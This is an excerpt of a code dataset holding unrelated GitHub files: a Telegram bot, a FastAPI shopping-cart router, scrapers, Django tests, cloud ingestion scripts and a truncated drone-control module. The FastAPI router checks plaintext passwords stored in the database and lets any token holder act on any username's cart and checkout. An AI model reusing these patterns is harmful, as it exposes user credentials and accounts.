http_method=\"GET\", name=\"patients.all\")\n def patients(self, request):\n\n doctor = ndb.Key(urlsafe=request.ekey).get()\n\n patients = doctor.patients()\n\n patients_msg = []\n for p in patients:\n patients_msg.append(p.to_message(ignore_fields=('doctor_key',), with_active_treatment=True))\n\n return treatments_messages.PatientsCollection(patients=patients_msg)\n\n @endpoints.method(ACTION_REQUEST_PARAMS, treatments_messages.TreatmentActionMsg,\n path=\"treatment/action\", http_method=\"GET\", name=\"treatment.action.get\")\n def action_details(self, request):\n\n action = ndb.Key(urlsafe=request.ekey).get()\n\n action_msg = action.to_message()\n\n if request.fulfillments_range_init is not None and request.fulfillments_range_finish is not None:\n query = Fulfillment.query(ancestor=action.key).order(Fulfillment.for_moment)\n fulfillments = query.fetch(request.fulfillments_range_finish)\n\n fulfillments_msgs = []\n\n for f in fulfillments:\n\n fulfillments_msgs.append(f.to_message())\n\n action_msg.fulfillments = fulfillments_msgs\n\n return action_msg\n\n\n\n\n\n\n\n\n\n\n","repo_name":"capicarbone/treatments-manager","sub_path":"api/for_doctors.py","file_name":"for_doctors.py","file_ext":"py","file_size_in_byte":9287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29292998994","text":"import io\nimport time\nimport requests\nimport telebot\n\n\nclass Sender:\n\n def __init__(self, CHANNEL_NAME, API_TOKEN, data_folder, flesson, DELAY_TIMER, STOP_STRING, work_course_folder):\n self.CHANNEL_NAME = CHANNEL_NAME\n self.API_TOKEN = API_TOKEN\n self.data_folder = data_folder\n self.flesson = flesson\n self.DELAY_TIMER = DELAY_TIMER\n self.STOP_STRING = STOP_STRING\n self.work_course_folder = work_course_folder\n Sender.sender(self, API_TOKEN, CHANNEL_NAME, flesson, DELAY_TIMER, STOP_STRING, work_course_folder, data_folder)\n\n def sendcontentdoc(self, data_folder, cont, CHANNEL_NAME, bot, work_course_folder):\n cont = cont.strip()\n line_doc = work_course_folder.replace(\"'\", '') + data_folder + cont\n doc = open(line_doc.replace(\"\\n\", \"\"), 'rb')\n bot.send_document(CHANNEL_NAME.replace(\"'\", ''), doc)\n\n def sendcontentvideo(self, data_folder, cont, CHANNEL_NAME, bot, work_course_folder):\n cont = cont.strip().replace(\"\\n\", \"\")\n line_doc = work_course_folder.replace(\"'\", '').replace(\"\\n\", \"\") \\\n + data_folder.replace(\"\\n\", \"\").replace(\"'\", '') + cont\n print(line_doc)\n doc = line_doc.replace(\"\\n\", \"\")\n bot.send_video(CHANNEL_NAME, open(doc, 'rb'), width=720, height=1280, timeout=60)\n # , width=720, height=1280, timeout=60\n\n def sendcontentphoto(self, data_folder, cont, CHANNEL_NAME, bot, work_course_folder):\n cont = cont.strip()\n line_doc = work_course_folder.replace(\"'\", '') + data_folder + cont\n doc = open(line_doc.replace(\"\\n\", \"\"), 'rb')\n\n bot.send_photo(CHANNEL_NAME.replace(\"'\", ''), doc, timeout=60)\n\n def sendcontentmessageHTML(self, cont, CHANNEL_NAME, bot):\n bot.send_message(CHANNEL_NAME.replace(\"\\n\", \"\"), f\"{cont}\", parse_mode='html')\n\n def sendcontentmessage(self, cont, API_TOKEN, CHANNEL_NAME):\n TAKE_ID_CHANNEL = 'https://api.telegram.org/bot' + API_TOKEN.replace(\"\\n\", \"\").replace(\"'\", \"\") \\\n + '/sendMessage?chat_id=' + CHANNEL_NAME.replace(\"\\n\", \"\") + '&text=' + cont\n\n requests.get(TAKE_ID_CHANNEL)\n\n def start_bot(self, API_TOKEN):\n bot1 = telebot.TeleBot(API_TOKEN)\n return bot1\n\n def sender(self, API_TOKEN, CHANNEL_NAME, flesson, DELAY_TIMER, STOP_STRING, work_course_folder, data_folder):\n\n w_script = work_course_folder.replace(\"'\", '').replace(\"\\n\", \"\") + flesson\n bot = telebot.TeleBot(API_TOKEN.replace(\"'\", \"\"))\n\n with io.open(w_script, encoding='utf-8') as file:\n for line in file:\n\n READ_STRING = str(line)\n if len(line.strip()) == 0:\n\n time.sleep(DELAY_TIMER)\n elif 'wait' in READ_STRING:\n\n Lfile = READ_STRING.split('#')\n split = Lfile[1]\n split.replace(\"\\n\", \"\")\n WAIT_TIMER = int(split) # * 60\n time.sleep(WAIT_TIMER)\n elif READ_STRING == STOP_STRING:\n print('Закончили')\n file.close()\n break\n else:\n if '#' in READ_STRING:\n if 'document' in READ_STRING:\n Lfile = READ_STRING.split('#')\n cont = Lfile[1]\n print(f'Нашли документ {cont}')\n self.sendcontentdoc(data_folder, cont, CHANNEL_NAME, bot, work_course_folder)\n if 'video' in READ_STRING:\n Lfile = READ_STRING.split('#')\n cont = Lfile[1]\n print(f'Нашли видео {cont}')\n cont = cont.strip().replace(\"\\n\", \"\")\n # line_doc = work_course_folder.replace(\"'\", '').replace(\"\\n\", \"\") + data_folder + cont\n\n # doc = open(line_doc, 'rb')\n self.sendcontentvideo(data_folder, cont, CHANNEL_NAME, bot, work_course_folder)\n # doc = open(line_doc.replace(\"\\n\", \"\"), 'rb')\n\n # bot.send_video(CHANNEL_NAME, doc, width=720, height=1280, 
timeout=60)\n\n if 'photo' in READ_STRING:\n Lfile = READ_STRING.split('#')\n cont = Lfile[1]\n print(f'Нашли фото {cont}')\n self.sendcontentphoto(data_folder, cont, CHANNEL_NAME, bot, work_course_folder)\n if 'html' in READ_STRING:\n Lfile = READ_STRING.split('#')\n cont = Lfile[1]\n print(f'Нашли HTML {cont}')\n self.sendcontentmessageHTML(cont, CHANNEL_NAME.replace(\"'\", ''), bot)\n else:\n cont = READ_STRING\n print(f'Нашли текст {cont}')\n self.sendcontentmessage(cont, API_TOKEN.replace(\"'\", ''), CHANNEL_NAME.replace(\"'\", ''))\n return bot\n\n bot.infinity_polling()\n","repo_name":"DocentoFF/web","sub_path":"WebTLMS/webfront/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
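The `if 'document' ... if 'video' ...` chain in the record above could be collapsed into a dispatch table. A hedged sketch of the idea, assuming script lines of the form `kind#payload` and simplifying the send helpers to bare telebot calls:

```python
# Maps the keyword in a script line to the bot method that handles it.
HANDLERS = {
    'document': lambda bot, chat, path: bot.send_document(chat, open(path, 'rb')),
    'photo':    lambda bot, chat, path: bot.send_photo(chat, open(path, 'rb')),
    'video':    lambda bot, chat, path: bot.send_video(chat, open(path, 'rb')),
}

def dispatch(bot, chat, line):
    # partition splits on the first '#': everything before is the kind,
    # everything after is the payload (a file path in this sketch).
    kind, _, payload = line.partition('#')
    handler = HANDLERS.get(kind.strip())
    if handler:
        handler(bot, chat, payload.strip())
```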
+{"seq_id":"5878606847","text":"\"\"\"Authentication management implementation.\"\"\"\r\n\r\nfrom fastapi import APIRouter, status, Depends\r\nfrom fastapi_jwt_auth import AuthJWT\r\nimport pydantic\r\nfrom bson.objectid import ObjectId\r\nfrom schemas.authentication import Authentication\r\nfrom schemas.user_profile import UserProfileCategoryInput, UserProfileInput, UserAddressInput\r\nfrom db.mongodb import data_db\r\nfrom utility.api_response import http_exception\r\n\r\n# Fix ObjectId & FastApi conflict\r\npydantic.json.ENCODERS_BY_TYPE[ObjectId] = str\r\n\r\nrouter = APIRouter(tags=[\"Authentication\"])\r\n\r\n\r\n@router.post(\"/authenticate\")\r\nasync def authenticate_user(manage_auth: Authentication,\r\n jwt_token: AuthJWT = Depends()):\r\n user = await data_db.users.find_one(\r\n {\"auth.username\": manage_auth.username,\r\n \"auth.password\": manage_auth.password}\r\n )\r\n\r\n if user:\r\n return {\"Authentication\": \"Success\",\r\n \"access_token\": jwt_token.create_access_token(subject=manage_auth.username)}\r\n else:\r\n raise http_exception(message=\"Check your credentials.\", status=status.HTTP_401_UNAUTHORIZED)\r\n\r\n\r\n@router.put(\"/user-profile/category\")\r\nasync def add_user_favorite(update_info: UserProfileCategoryInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": update_info.username})\r\n\r\n user_favorites = user[\"preferences\"][\"category_list\"]\r\n\r\n new_category = update_info.category\r\n\r\n if new_category not in user_favorites:\r\n user_favorites.append(new_category)\r\n\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": update_info.username},\r\n {\"$set\":\r\n {\"preferences.category_list\": user_favorites}}\r\n )\r\n\r\n return user_favorites\r\n\r\n\r\n@router.delete(\"/user-profile/category\")\r\nasync def remove_user_favorite(update_info: UserProfileCategoryInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": update_info.username})\r\n\r\n user_favorites = user[\"preferences\"][\"category_list\"]\r\n\r\n new_category = update_info.category\r\n\r\n if new_category in user_favorites:\r\n user_favorites.remove(new_category)\r\n\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": update_info.username},\r\n {\"$set\":\r\n {\"preferences.category_list\": user_favorites}}\r\n )\r\n\r\n return user_favorites\r\n\r\n\r\n@router.put(\"/user-profile/cart/add/{product_uuid}\")\r\nasync def add_product_to_cart(product_uuid: str,\r\n update_info: UserProfileInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": update_info.username})\r\n\r\n user_cart = user[\"preferences\"][\"current_cart\"]\r\n\r\n product = await data_db.products.find_one({\"content.product_uuid\": product_uuid})\r\n\r\n if product is not None and product[\"content\"][\"product_count\"] > 0:\r\n if not user_cart.get(product[\"content\"][\"product_category\"]):\r\n user_cart[product[\"content\"][\"product_category\"]] = []\r\n\r\n user_cart[product[\"content\"][\"product_category\"]].append(product)\r\n\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": update_info.username},\r\n {\"$set\":\r\n {\"preferences.current_cart\": user_cart}}\r\n )\r\n return {\"detail\": f'{product[\"content\"][\"product_name\"]} added to cart.'}\r\n\r\n raise http_exception(message=\"Product not in stock.\", 
status=status.HTTP_406_NOT_ACCEPTABLE)\r\n\r\n\r\n@router.delete(\"/user-profile/cart/remove/{product_uuid}\")\r\nasync def remove_product_from_cart(product_uuid: str,\r\n update_info: UserProfileInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": update_info.username})\r\n\r\n user_cart = user[\"preferences\"][\"current_cart\"]\r\n\r\n product = await data_db.products.find_one({\"content.product_uuid\": product_uuid})\r\n\r\n if product is not None:\r\n if user_cart.get(product[\"content\"][\"product_category\"]):\r\n try:\r\n user_cart[product[\"content\"][\"product_category\"]].remove(product)\r\n\r\n if len(user_cart[product[\"content\"][\"product_category\"]]) == 0:\r\n del user_cart[product[\"content\"][\"product_category\"]]\r\n\r\n except Exception as e:\r\n return {\"detail\": \"Product is not in the cart.\",\r\n \"error\": e}\r\n\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": update_info.username},\r\n {\"$set\":\r\n {\"preferences.current_cart\": user_cart}}\r\n )\r\n return {\"detail\": f'{product[\"content\"][\"product_name\"]} removed from cart.'}\r\n\r\n return {\"detail\": \"Product is not in the cart.\"}\r\n\r\n\r\n@router.post(\"/user-profile/cart\")\r\nasync def get_user_cart(update_info: UserProfileInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": update_info.username})\r\n\r\n user_cart = user[\"preferences\"][\"current_cart\"]\r\n\r\n return user_cart\r\n\r\n\r\n@router.post(\"/user-profile/cart/checkout/address\")\r\nasync def validate_user_address(address_info: UserAddressInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": address_info.username})\r\n\r\n if address_info.address is not None:\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": address_info.username},\r\n {\"$set\":\r\n {\"preferences.address\": address_info.address, \"validated_address\": True},\r\n }\r\n )\r\n else:\r\n if user[\"preferences\"][\"address\"] is None:\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": address_info.username},\r\n {\"$set\":\r\n {\"preferences.address\": address_info.address, \"validated_address\": False},\r\n }\r\n )\r\n\r\n return {\"Authorized\"}\r\n\r\n\r\n@router.post(\"/user-profile/cart/checkout/payment\")\r\nasync def validate_user_payment(user_info: UserProfileInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": user_info.username})\r\n\r\n if user[\"preferences\"][\"payment_settings\"] is None or user[\"preferences\"][\"payment_settings\"] == \" \":\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": user_info.username},\r\n {\"$set\":\r\n {\"validated_payment\": False}}\r\n )\r\n\r\n else:\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": user_info.username},\r\n {\"$set\":\r\n {\"validated_payment\": True}}\r\n )\r\n\r\n return {\"Authorized\"}\r\n\r\n\r\n@router.post(\"/user-profile/cart/checkout/review-order\")\r\nasync def validate_user_checkout(user_info: UserProfileInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": user_info.username})\r\n\r\n receipt_result = user[\"validated_payment\"] and user[\"validated_address\"]\r\n\r\n return {\r\n 
\"confirmed_items\": user[\"preferences\"][\"current_cart\"],\r\n \"address\": user[\"preferences\"][\"address\"],\r\n \"payment\": user[\"preferences\"][\"payment_settings\"],\r\n \"receipt\": receipt_result\r\n }\r\n","repo_name":"diego-pedro/data-management-product-catalog","sub_path":"routers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":7815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"70805044069","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\nlink = 'https://news.un.org/en/tags/sdgs'\nquote_link = \"https://api.quotable.io/quotes/random?limit=3\"\ndate_frmt = \"%d %B %Y\"\noutput_frmt = \"%d %b\"\n\nquotes = {}\n\n\ndef get_blogs():\n r = requests.get(link)\n soup = BeautifulSoup(r.content, 'html.parser')\n s = soup.find('div', class_=\"view-content\")\n h = s.find_all('h2', class_=\"node__title\")\n div = s.find_all('div', class_=\"node__content\")\n span = s.find_all('time', class_=\"datetime\")\n\n a_links = []\n headers = []\n descrip = []\n dates = []\n dt = []\n\n for h2 in h:\n a_tag = h2.find('a') # Find the tag within each element\n if a_tag:\n a_links.append(f\"https://news.un.org{a_tag['href']}\")\n headers.append(a_tag.text)\n for tag in div:\n p = tag.find('p')\n if p:\n descrip.append(p.text)\n for tag in span:\n if tag:\n txt = tag.text\n frmt_date = datetime.strptime(txt, date_frmt)\n formatted_date = frmt_date.strftime(output_frmt)\n dates.append(formatted_date)\n\n for i in range(len(a_links)):\n dt.append([headers[i], descrip[i], a_links[i], dates[i]])\n\n return dt\n\n\ndef get_quote():\n q = requests.get(quote_link)\n q = q.json()\n for i in q:\n quotes[i['content']] = i['author']\n return quotes\n","repo_name":"Mayur-Gowda/WebDev","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"10481022092","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom factory import SubFactory\n\nfrom ..factories import (\n ComponentFactory,\n EditorialFactory,\n EmbedFactory,\n ImageFactory,\n ImageWithTextFactory,\n PageFactory,\n QuoteFactory,\n TableFactory,\n)\n\n\nclass TestPageView(TestCase):\n def test_url_resolves(self):\n \"\"\"\"\n URL resolves as expected\n \"\"\"\n page = PageFactory(title='this? is& a! (test*)')\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n self.assertEqual(url, '/this-is-a-test/')\n\n def test_get(self):\n \"\"\"\"\n GET request uses template\n \"\"\"\n page = PageFactory(title='this? is& a! (test*)')\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'pages/page.html')\n\n def test_get_no_page(self):\n \"\"\"\"\n GET request returns a 404 when no page found\n \"\"\"\n url = reverse('page-detail', kwargs={'slug': 'this is a test'})\n\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, 404)\n self.assertTemplateUsed(response, 'error/error.html')\n\n def test_component_editorial(self):\n \"\"\"\"\n GET request returns editorial component as expected\n \"\"\"\n page = PageFactory()\n editorial = EditorialFactory(title='first editorial block',\n component=SubFactory(ComponentFactory,\n page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_editorial = component.editorial\n self.assertEqual(first_editorial, editorial)\n self.assertEqual(first_editorial.title, 'first editorial block')\n\n def test_component_embed(self):\n \"\"\"\"\n GET request returns embed component as expected\n \"\"\"\n page = PageFactory()\n embed = EmbedFactory(title='first embed block',\n component=SubFactory(ComponentFactory, page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_embed = component.embed\n self.assertEqual(first_embed, embed)\n self.assertEqual(first_embed.title, 'first embed block')\n\n def test_component_image(self):\n \"\"\"\"\n GET request returns image component as expected\n \"\"\"\n page = PageFactory()\n image = ImageFactory(caption='first image block',\n component=SubFactory(ComponentFactory, page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_image = component.image\n self.assertEqual(first_image, image)\n self.assertEqual(first_image.caption, 'first image block')\n\n def test_component_image_with_text(self):\n \"\"\"\"\n GET request returns image with text component as expected\n \"\"\"\n page = PageFactory()\n image_with_text = ImageWithTextFactory(\n title='first image with text block',\n component=SubFactory(ComponentFactory, page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_image_with_text = component.image_with_text\n self.assertEqual(first_image_with_text, image_with_text)\n self.assertEqual(first_image_with_text.title,\n 'first image with text block')\n\n def test_component_quote(self):\n \"\"\"\"\n GET request returns quote component as expected\n 
\"\"\"\n page = PageFactory()\n quote = QuoteFactory(quote='first quote block',\n component=SubFactory(ComponentFactory, page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_quote = component.quote\n self.assertEqual(first_quote, quote)\n self.assertEqual(first_quote.quote, 'first quote block')\n\n def test_component_table(self):\n \"\"\"\"\n GET request returns table component as expected\n \"\"\"\n page = PageFactory()\n table = TableFactory(title='first table block',\n component=SubFactory(ComponentFactory, page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_table = component.table\n self.assertEqual(first_table, table)\n self.assertEqual(first_table.title, 'first table block')\n","repo_name":"orangespaceman/tanmt","sub_path":"tanmt/pages/tests/views/test_page_view.py","file_name":"test_page_view.py","file_ext":"py","file_size_in_byte":5153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"25509715749","text":"# Импортируем текст из файла ch1text\r\nimport ch1text\r\n\r\n\r\n# объявляем фукнкцию расчета параметров формулы (функция по вызову функций)\r\ndef computer_readavility(text):\r\n # Объявляем переменные для записи параметров\r\n total_words = 0\r\n total_sentences = 0\r\n total_syllables = 0\r\n score = 0 # Итоговое кол-во баллов\r\n\r\n # Рассчитываем кол-во слов в тексте\r\n words = text.split()\r\n total_words = len(words)\r\n\r\n # Вызываем функцию расчета кол-ва предложений\r\n total_sentences = count_sentences(text)\r\n\r\n # Вызываем функцию расчета кол-ва слогов\r\n total_syllables = count_syllables(words)\r\n\r\n # Вызываем функцию расчета удобочитаемости\r\n score = compute_readability(total_words, total_sentences, total_syllables)\r\n\r\n # Вызываем функцию с показателями (кому нужно)\r\n #indicators(total_words, total_sentences, total_syllables, score)\r\n \r\n # Вызываем функцию вывода классификации удобночитаемости\r\n output_result(score)\r\n\r\n\r\n# Рассчитываем кол-во предложений в тексте\r\ndef count_sentences(text):\r\n count = 0\r\n terminals = ['.','!','?']\r\n for i in text:\r\n if i in terminals: # Ищем символы завершения предложения\r\n count = count +1\r\n return count\r\n\r\n\r\n# Суммируем получаемые слоги в тексте по каждому слову \r\ndef count_syllables(words):\r\n count = 0\r\n for word in words:\r\n word_count = count_syllables_in_word(word)\r\n count = count + word_count\r\n return count\r\n\r\n\r\n# Расситываем кол-во слогов в тексте\r\ndef count_syllables_in_word(word):\r\n count = 0\r\n processed_word = word\r\n\r\n # Проверяем, является ли последний символ в строке знаком\r\n if processed_word[-1] in '.,;:!?': \r\n processed_word = processed_word[0:-1]\r\n \r\n # Проверяем, является ли последний символ в строке буквой eE,\r\n # которые не являются слогом в конце слова\r\n if processed_word[-1] in 'eE': \r\n processed_word = processed_word[0:-1]\r\n\r\n # Если кол-во символов в слове меньше или равно 3, то возвращаем значение\r\n if len(processed_word) <= 3:\r\n return 1\r\n\r\n # объявляем список гласных\r\n vowels = 'aeiouAEIOU'\r\n prev_char_was_vowel = False # Переменная для учета предыдущей гласной\r\n\r\n for char in processed_word:\r\n if char in vowels:\r\n if not prev_char_was_vowel:\r\n count = count + 1\r\n prev_char_was_vowel = True\r\n else:\r\n prev_char_was_vowel = False\r\n\r\n # Если последний символ строки является yY, то увеличиваем счетчик слогов\r\n if processed_word[-1] in 'yY':\r\n count = count +1\r\n \r\n return count\r\n\r\n\r\n# Фунция расчета удобночитаемости\r\ndef compute_readability(total_words, total_sentences, total_syllables):\r\n score = (206.835-1.015*(total_words/total_sentences)\r\n - 84.6*(total_syllables/total_words))\r\n return score\r\n\r\n# Функция вывода итоговой классификации\r\ndef output_result (score):\r\n if score>= 90:\r\n print('Уровень 5-го классаы')\r\n elif score>= 80:\r\n print('Уровень 6-го класса')\r\n elif score>= 70:\r\n print('Уровень 7-го класса')\r\n elif score>= 60:\r\n print('Уровень 8-9-го классов')\r\n elif score>= 50:\r\n print('Уровень 10-11-го классов')\r\n elif score>= 30:\r\n print('Уолвень студента вуза')\r\n else:\r\n print('Уровень выпускника вуза')\r\n\r\n# Вывод показателей расчетов\r\ndef indicators(total_words, total_sentences, total_syllables, score):\r\n print(total_words, 'слов')\r\n print(total_sentences, 'предложений')\r\n print(total_syllables,'слогов')\r\n print(score,'- удобочитаемость')\r\n\r\n\r\n# Передаем текст на оценку в начальный 
метод! \r\ncomputer_readavility(ch1text.text)\r\n\r\n\r\n \r\n\r\n","repo_name":"Dogodaev/pyton_lessons","sub_path":"ch6/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"25611564621","text":"# Given n non-negative integers representing the histogram's bar height where the width of each bar is 1, find the area of largest rectangle in the histogram.\n# Above is a histogram where width of each bar is 1, given height = [2,1,5,6,2,3].\n# The largest rectangle is shown in the shaded area, which has area = 10 unit.\n\n# Example:\n\n# Input: [2,1,5,6,2,3]\n# Output: 10\n\nclass Solution(object):\n def largestRectangleArea(self, heights):\n \"\"\"\n :type heights: List[int]\n :rtype: int\n \"\"\"\n if len(heights) == 0:\n return 0\n hq = [heights[0]]\n cq = [1]\n ans = heights[0]\n for i in range(1, len(heights)):\n if heights[i] == heights[i-1]:\n cq[-1] += 1\n elif heights[i] < heights[i-1]: #decrease\n ans = decr(heights, i, hq, cq, ans)\n else:\n hq.append(heights[i])\n cq.append(1)\n ans = summ(hq, cq, ans)\n return ans\n\n \ndef decr(heights, i, hq, cq, ans):\n h = heights[i]\n accum = 0\n while len(hq) != 0:\n if hq[-1] > h:\n accum += cq[-1]\n cq.pop()\n ans = max(ans, hq[-1]*accum)\n hq.pop()\n else:\n break\n hq.append(h)\n cq.append(accum+1)\n return ans\n \n \ndef summ(hq, cq, ans):\n accum = 0\n #while len(hq) != 0:\n # h, count = hq.pop()\n for i in reversed(range(len(hq))):\n accum += cq[i]\n ans = max(ans, hq[i]*accum)\n return ans\n \n \n","repo_name":"ruizhang84/LeetCode","sub_path":"largestRectangleArea.py","file_name":"largestRectangleArea.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39392846004","text":"import boto3\n\nglue_client = boto3.client('glue')\n\ndef handler(event, context):\n for record in event['Records']:\n bucket = record['s3']['bucket']['name']\n key = record['s3']['object']['key']\n json_input = 's3://' + bucket + '/' + key\n glue_client.start_job_run(JobName='json-to-pq-first',\n Arguments={'--json_input': json_input})\n","repo_name":"mariusfeteanu/sogdian-web-analytics","sub_path":"code/lambda/json2pq.py","file_name":"json2pq.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"17426513321","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis module contains the functions for solving the data ingestion task.\nTask Description:\n Download files from GitHub in batches of a certain size.\n\"\"\"\nimport pickle\nfrom typing import Dict\nfrom types import SimpleNamespace\n\nfrom google.cloud import storage\n\nfrom code.ingest.utils import get_batches, fn_parallel\nfrom code.utils.utils import time_execution, get_project_root\n\n\ndef download_batches_from_bucket(destination: str, source: str, batches: Dict) -> None:\n \"\"\"\n Downloads the batches from the target source bucket using Google Python Libraries.\n :param destination: The target destination.\n :param source: The target source.\n :param batches: The batches data structure.\n :return: None.\n \"\"\"\n # Setup bucket\n client = storage.Client.create_anonymous_client()\n bucket = client.bucket(bucket_name=source, user_project=None)\n for batch, _ in batches.items():\n fn_calls = []\n for _, v in batches[batch].items():\n blob = storage.Blob(v['path'], bucket)\n fn_calls.append(blob.download_to_filename(filename=get_project_root() + '/' + destination + v['path'],\n client=client))\n fn_parallel(*fn_calls)\n\n\n@time_execution\ndef data_ingestion(config: SimpleNamespace) -> None:\n \"\"\"\n Executes the solution of first task.\n :param config: The configuration file from the initial .yaml.\n :type config: SimpleNamespace.\n :return: None.\n \"\"\"\n # Create or get batches.\n if config.get(\"use_cached\"):\n with open(get_project_root() + config.get(\"file_path\"), 'rb') as fh:\n batches = pickle.load(fh)\n else:\n batches = get_batches(user=config.get(\"user\"),\n repo=config.get(\"repo\"),\n batch_size=config.get(\"batch_size\"),\n save_tree=config.get(\"save_tree\"),\n tree_path=config.get(\"file_path\"),\n repo_url=config.get(\"repo_url\"))\n\n # Download files into target destination folder.\n download_batches_from_bucket(destination=config.get(\"sink\"),source=config.get(\"source\"), batches=batches)\n return None\n","repo_name":"skoett/de-assignment_v2","sub_path":"code/ingest/gcp_ingestion.py","file_name":"gcp_ingestion.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"36395454414","text":"import flask\nimport limits.storage\n\nfrom app.parallel_limiter import set_redis_concurrent_lock\nfrom app.session import RedisSessionStore\n\n\ndef initialize_redis_services(app: flask.Flask, redis_url: str):\n if redis_url.startswith(\"redis://\") or redis_url.startswith(\"rediss://\"):\n storage = limits.storage.RedisStorage(redis_url)\n app.session_interface = RedisSessionStore(storage.storage, storage.storage, app)\n set_redis_concurrent_lock(storage)\n elif redis_url.startswith(\"redis+sentinel://\"):\n storage = limits.storage.RedisSentinelStorage(redis_url)\n app.session_interface = RedisSessionStore(\n storage.storage, storage.storage_slave, app\n )\n set_redis_concurrent_lock(storage)\n else:\n raise RuntimeError(\n f\"Tried to set_redis_session with an invalid redis url: ${redis_url}\"\n )\n","repo_name":"simple-login/app","sub_path":"app/redis_services.py","file_name":"redis_services.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":4235,"dataset":"github-code","pt":"71"}
+{"seq_id":"28815206488","text":"#!/usr/bin/env python3\n\"\"\"\n * File: offb_node.py\n * Stack and tested in Gazebo 9 SITL\n\"\"\"\n\nfrom geometry_msgs.msg import PoseStamped\nfrom mavros_msgs.msg import State\nfrom mavros_msgs.srv import CommandBool, CommandBoolRequest, SetMode, SetModeRequest\n\nimport threading\nimport time\n\n# ROS\nimport rospy\n\nfrom std_msgs.msg import Int16\n# MAVROS\nfrom mavros_msgs.msg import OverrideRCIn\n# from mavros_msgs.srv import CommandBool\nfrom mavros_msgs.msg import WaypointList, WaypointReached\n\nfrom mavros_msgs.srv import WaypointPush, WaypointPull, WaypointClear, WaypointSetCurrent\n# from mavros_msgs.srv import *\nfrom mavros_msgs.srv import ParamGet\n\nfrom mavros_msgs.srv import CommandLong\n\n# from mavros_msgs.srv import ParamSet, SetMode\n# TODO Missing import from mavros_msgs.srv import WaypointGOTO\n# from mavros.mission import *\n\n\ncurrent_state = State()\n\n\ndef state_cb(msg):\n global current_state\n current_state = msg\n\n\n# Globals\nTHROTTLE_CHANNEL = 2\nSTEER_CHANNEL = 0\n\nEXEC_TIME = 1 # exc time in secs\n\n\nclass UAV_Control:\n \"\"\"UAV WP and Manual Control\"\"\"\n\n def __init__(self):\n self.lock = threading.Lock()\n # mavros.set_namespace(\"/mavros\")\n self.waypoint_list = None\n self.current_waypoint = None\n\n # Proxies\n rospy.wait_for_service('/mavros/param/get')\n self.svc_get_param = rospy.ServiceProxy('/mavros/param/get', ParamGet)\n\n rospy.wait_for_service('/mavros/mission/push')\n self.svc_push_waypoints = rospy.ServiceProxy('/mavros/mission/push', WaypointPush)\n\n rospy.wait_for_service('/mavros/mission/pull')\n self.svc_pull_waypoints = rospy.ServiceProxy('/mavros/mission/pull', WaypointPull)\n\n 